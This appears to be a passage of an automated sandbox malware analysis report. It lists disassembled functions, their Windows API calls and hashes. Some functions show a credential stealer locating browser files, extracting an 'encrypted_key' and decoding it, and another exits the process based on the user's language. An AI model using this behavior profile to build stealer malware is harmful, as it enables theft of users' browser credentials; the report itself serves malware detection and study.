Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 22c72e6db2a0354ce844fe70e2acc3b16ab785bcebb1bb10fbff161cf13cb651
Instruction ID: 8da5b41b2087120ee408525df9e168e10d279f5c7a0a87a6e3233bbea95dd9f1
Opcode Fuzzy Hash: 22c72e6db2a0354ce844fe70e2acc3b16ab785bcebb1bb10fbff161cf13cb651
Instruction Fuzzy Hash: 44C1B8B5D011189BDB14EFA4DC89FEA7378FB64304F004599F10AE7541EB34AA85CFA2

Function 008A4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A42EC
lstrcat.KERNEL32(?,0156D9B0), ref: 008A430B
lstrcat.KERNEL32(?,?), ref: 008A431F
lstrcat.KERNEL32(?,0156C868), ref: 008A4333

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008A8D90: GetFileAttributesA.KERNEL32(00000000,?,00891B54,?,?,008B564C,?,?,008B0E1F), ref: 008A8D9F

Part of subcall function 00899CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00899D39

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A93C0: GlobalAlloc.KERNEL32(00000000,008A43DD,008A43DD), ref: 008A93D3

StrStrA.SHLWAPI(?,0156D8C0), ref: 008A43F3
GlobalFree.KERNEL32(?), ref: 008A4512

Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899AEF
Part of subcall function 00899AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00894EEE,00000000,?), ref: 00899B01
Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899B2A
Part of subcall function 00899AC0: LocalFree.KERNEL32(?,?,?,?,00894EEE,00000000,?), ref: 00899B3F

lstrcat.KERNEL32(?,00000000), ref: 008A44A3
StrCmpCA.SHLWAPI(?,008B08D1), ref: 008A44C0
lstrcat.KERNEL32(00000000,00000000), ref: 008A44D2
lstrcat.KERNEL32(00000000,?), ref: 008A44E5
lstrcat.KERNEL32(00000000,008B0FB8), ref: 008A44F4

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 51dd5df6fac774d0492d410891645044ddc0d1ca6d6b24c28e8b2ac10468ec59
Instruction ID: 4c03d41d34ff8c907c2b38b0ee60a1e511f193e884082c2caff97241b9c8d0f4
Opcode Fuzzy Hash: 51dd5df6fac774d0492d410891645044ddc0d1ca6d6b24c28e8b2ac10468ec59
Instruction Fuzzy Hash: 207142B6900208ABDF14EBE4DC85FEE7379FB98300F044599F606D6581EA74DB45CBA2

Function 6C6BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6BAC52
CreateFileMappingW.KERNEL32 ref: 6C6BAC7D
GetSystemInfo.KERNEL32 ref: 6C6BAC98
MapViewOfFile.KERNEL32 ref: 6C6BACB0
GetSystemInfo.KERNEL32 ref: 6C6BACCD
MapViewOfFile.KERNEL32 ref: 6C6BAD05
UnmapViewOfFile.KERNEL32 ref: 6C6BAD1C
CloseHandle.KERNEL32 ref: 6C6BAD28
UnmapViewOfFile.KERNEL32 ref: 6C6BAD37
CloseHandle.KERNEL32 ref: 6C6BAD43
CloseHandle.KERNEL32 ref: 6C6BAD67

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction ID: 1d55252a4fddc2fce995aea856eb7163ac88f37b0f772768b4ec13c3e935887d
Opcode Fuzzy Hash: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction Fuzzy Hash: A53190B1A043058FDB00AF7EC68826EBBF0FF85345F014A2DE98597215EB70A559CB86

Function 6C6A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8273), ref: 6C6A9D65
free.MOZGLUE(6C6A8273,?), ref: 6C6A9D7C
free.MOZGLUE(?,?), ref: 6C6A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6A9E0F
free.MOZGLUE(6C6A946B,?,?), ref: 6C6A9E24
free.MOZGLUE(?,?,?), ref: 6C6A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6A9EC8
free.MOZGLUE(6C6A946B,?,?,?), ref: 6C6A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6A9EF5

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction ID: fa545ec4329949322bd680fc9968324518d816ccd6c396595b76251b73b351ee
Opcode Fuzzy Hash: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction Fuzzy Hash: 2F71DF70909B418BC712CF68C48055BF3F4FF99318B508A5DE84A5BB02EB31E8C6CB99

Function 6C6ADDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6ADDCF

Part of subcall function 6C68FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C68FA4B

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE0D
free.MOZGLUE(00000000), ref: 6C6ADE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF32

Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADB86
Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF65
free.MOZGLUE(?), ref: 6C6ADF80

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction ID: 0ac89ea29ca3db6d5035dcbc7cb8b3ff9466a922f856cee50f87de06b4473153
Opcode Fuzzy Hash: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction Fuzzy Hash: 4551A1726016019BD7219BA9C8806EFB3B2BF96308F95051CDD5A53B00DB31BD1BCB9E

Function 6C6B5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DC9
std::_Facet_Register.LIBCPMT ref: 6C6B5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E45

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction ID: d43d3134bb9ef4e9c4d1c2bb39eb2cd6776b1883bcd6658d4225881a6cacb5f0
Opcode Fuzzy Hash: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction Fuzzy Hash: 08417C307002049FDB10DFA6C8D8AAE77F6EF89314F144169E506AB791EB30A915CB69

Function 6C68CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6531A7), ref: 6C68CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C68CFA4, 6C68CFB8
<jemalloc>, xrefs: 6C68CF9F, 6C68CFB3

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction ID: 8d2d31da99423ca1da97be1f51af25de81625c11ea9824aa909d2306d991b280
Opcode Fuzzy Hash: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction Fuzzy Hash: 7131A7307422056BFB10AF668C45BAE7775BF85754F204118F612EB684DB70E501CBBD

Function 6C65ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C65ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C65EDCC
CreateFileW.KERNEL32 ref: 6C65EE08
free.MOZGLUE(00000000), ref: 6C65EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C65EE32

Part of subcall function 6C65EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C65EBB5
Part of subcall function 6C65EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C68D7F3), ref: 6C65EBC3
Part of subcall function 6C65EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C68D7F3), ref: 6C65EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C65EDC1

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction ID: 58349f6a09830bb8ba9f10bcb68811798057119605d22f8757a79b57b5dcc24a
Opcode Fuzzy Hash: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction Fuzzy Hash: F251F171E052048BDF00DF69C8806EEB7F0AF4A318F94852DE8956B740E7346959C7EA

Function 6C6CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA565

Part of subcall function 6C6CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CA4BE
Part of subcall function 6C6CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6CA6B6

Strings

0, xrefs: 6C6CA5FB
z, xrefs: 6C6CA6AE

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction ID: 04f669c28a7bbff4618a294ce90f01ccbc11bc35cfc35bd6eeabef394af0ac6b
Opcode Fuzzy Hash: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction Fuzzy Hash: 75414771A097459FC341CF29C080A8BBBE4FF8A344F408A2EF49987651EB30D549CB87

Function 6C699420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
__Init_thread_footer.LIBCMT ref: 6C69949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C699459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C69947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C69946B

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction ID: aa2c4d1473f1cb2f1ae45731b97a48eff6bf2a21c92b5f4b9591bb7a0ffbe7d0
Opcode Fuzzy Hash: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction Fuzzy Hash: C5012830A001028BD7109B5ED840A8D33B99F06B3DF054537DD0AC6B52D623F4648D5F

Function 008A6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 008A6774
ExitProcess.KERNEL32 ref: 008A67A5
ExitProcess.KERNEL32 ref: 008A67AF
ExitProcess.KERNEL32 ref: 008A67B9
ExitProcess.KERNEL32 ref: 008A67C3
ExitProcess.KERNEL32 ref: 008A67CD

Strings

*, xrefs: 008A678C

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
